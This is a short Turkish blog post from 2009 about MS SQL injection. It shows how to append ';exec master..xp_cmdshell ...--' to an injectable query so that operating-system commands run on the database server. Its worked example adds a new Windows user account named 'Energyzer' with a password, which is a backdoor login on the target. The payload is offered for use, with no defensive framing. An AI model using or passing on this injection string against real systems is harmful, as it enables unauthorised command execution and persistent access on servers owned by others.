MsSQL Injection yaparken uzaktan cmdshell çalıştırabiliyoruz.Şu komut ile cmdshelli çalıştırabilmekteyiz.
;exec master..xp_cmdshell ’’--
’’ bıraktıgım yer size kalan komutların kullanacagınız yer.
mesela en basitinden ’’ şu kısımın arasına bizim o meşhur MS SQL
password ve user oluşturma komutumuzu kullanabiliriz.
’net user /add Energyzer Energyzer7’
Tamamlayacak olursak
;exec master..xp_cmdshell ’net user / add Energyzer Energyzer7’--
11 Eylül 2009 Cuma
MsSQL Injection ~ CmdShell Çalıştırma
Kaydol:
Kayıt Yorumları (Atom)
0 yorum:
Yorum Gönder